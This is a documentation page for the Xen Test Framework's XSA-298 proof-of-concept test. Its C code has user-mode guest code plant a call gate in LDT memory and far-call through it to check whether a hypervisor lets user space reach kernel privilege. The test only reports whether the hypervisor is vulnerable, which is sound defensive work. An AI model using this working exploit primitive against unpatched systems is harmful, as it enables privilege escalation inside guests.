docs/xtf/xsa-298_2main_8c_source.html

#include <xtf.h>


const char test_title[] = "XSA-298 PoC";


#define GATE_SEL (0x1000 | X86_SEL_LDT | 3)


unsigned int gate_target(void);

asm ("gate_target:;"

     "mov %cs, %eax;"

     __ASM_SEL(lretl, lretq)

    );


static void __user_text user1(void)

{

    env_gate *gate = _p(GATE_SEL & PAGE_MASK);


    pack_call_gate(gate, __KERN_CS, _u(&gate_target), 3, 0);

}


static unsigned long __user_text user2(void)

{

    /*

     * Don't put on the stack.  Some versions of Clang try to initialise it by

     * copying out of .rodata which is a supervisor mapping.

     */

    static far_ptr __user_data ptr = { .selector = GATE_SEL, };

    const char *vendor_ptr = _p(&ptr);

    unsigned int res = 0;


    if ( IS_DEFINED(CONFIG_64BIT) && vendor_is_amd )

        vendor_ptr += 4;


    asm volatile ("1:"

#ifdef __x86_64__

                  "rex64 "

#endif

                  "lcall *%[ptr]; 2:"

                  _ASM_EXTABLE_HANDLER(1b, 2b, %P[rec])

                  : "+a" (res)

                  : [rec] "p" (ex_record_fault_eax),

                    [ptr] "m" (*vendor_ptr),

                    /* Pretend to read all of ptr, or it gets optimised away. */

                    "m" (ptr));


    return res;

}


static int remap_linear(const void *linear, uint64_t flags)

{

    intpte_t nl1e = pte_from_virt(linear, flags);


    return hypercall_update_va_mapping(_u(linear), nl1e, UVMF_INVLPG);

}


void test_main(void)

{

    env_gate *gate = _p(GATE_SEL & PAGE_MASK);

    unsigned int res;


    /*

     * Prepare userspace memory.

     */

    void *volatile /* GCC issue 99578 */ ptr = gate;

    memset(ptr, 0, PAGE_SIZE);

    remap_linear(gate, PF_SYM(AD, U, RW, P));


    /*

     * Simulate a piece of userspace making the attack, with an

     * mprotect(PROT_READ) syscall in the middle.

     */

    exec_user_void(user1);

    remap_linear(gate, PF_SYM(AD, U, P));

    res = exec_user(user2);


    /*

     * Interpret the result.  Successful use of the call gate should return

     * the running %cs, while a fixed Xen should fail the far call with a #GP

     * fault.

     */

    switch ( res )

    {

    case __KERN_CS:

        return xtf_failure("Fail: vulnerable to XSA-298\n");


    case EXINFO_SYM(GP, GATE_SEL & ~X86_SEL_RPL_MASK):

        return xtf_success("Success: Not vulnerable to XSA-298\n");


    default:

        return xtf_failure("Fail: Unexpected return value %#x\n", res);

    }

}


/*

 * Local variables:

 * mode: C

 * c-file-style: "BSD"

 * c-basic-offset: 4

 * tab-width: 4

 * indent-tabs-mode: nil

 * End:

 */

ex_record_fault_eax
bool ex_record_fault_eax(struct cpu_regs *regs, const struct extable_entry *ex)
Record the current fault in %eax.
Definition: extable.c:8

__ASM_SEL
#define __ASM_SEL(c, l)
Definition: asm_macros.h:25

vendor_is_amd
#define vendor_is_amd
Definition: cpuid.h:34

__user_text
#define __user_text
Definition: compiler.h:33

__user_data
#define __user_data
Definition: compiler.h:34

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110

test_title
const char test_title[]
The title of the test.
Definition: main.c:24

EXINFO_SYM
#define EXINFO_SYM(exc, ec)
Definition: exinfo.h:29

hypercall_update_va_mapping
static long hypercall_update_va_mapping(unsigned long linear, uint64_t npte, enum XEN_UVMF flags)
Definition: hypercall.h:115

_ASM_EXTABLE_HANDLER
#define _ASM_EXTABLE_HANDLER(fault, fixup, handler)
Create an exception table entry with custom handler.
Definition: extable.h:38

exec_user
static unsigned long exec_user(unsigned long(*fn)(void))
Definition: lib.h:62

exec_user_void
static void exec_user_void(void(*fn)(void))
Definition: lib.h:70

memset
#define memset(d, c, n)
Definition: libc.h:33

IS_DEFINED
#define IS_DEFINED(x)
Evalute whether the CONFIG_ token x is defined.
Definition: macro_magic.h:67

GP
#define GP

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53

PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11

intpte_t
unsigned long intpte_t
Definition: page.h:152

PAGE_MASK
#define PAGE_MASK
Definition: page.h:12

pte_from_virt
intpte_t pte_from_virt(const void *va, uint64_t flags)

X86_SEL_RPL_MASK
#define X86_SEL_RPL_MASK
Definition: processor.h:189

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

uint64_t
__UINT64_TYPE__ uint64_t
Definition: stdint.h:17

PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108

pack_call_gate
static void pack_call_gate(env_gate *g, unsigned int sel, unsigned long offset, unsigned int dpl, unsigned int other)
Definition: x86-gate.h:110

UVMF_INVLPG
@ UVMF_INVLPG
Definition: xen.h:383

gate_target
unsigned int gate_target(void)

remap_linear
static int remap_linear(const void *linear, uint64_t flags)
Definition: main.c:85

user1
static void user1(void)
Definition: main.c:50

GATE_SEL
#define GATE_SEL
Definition: main.c:42

user2
static unsigned long user2(void)
Definition: main.c:57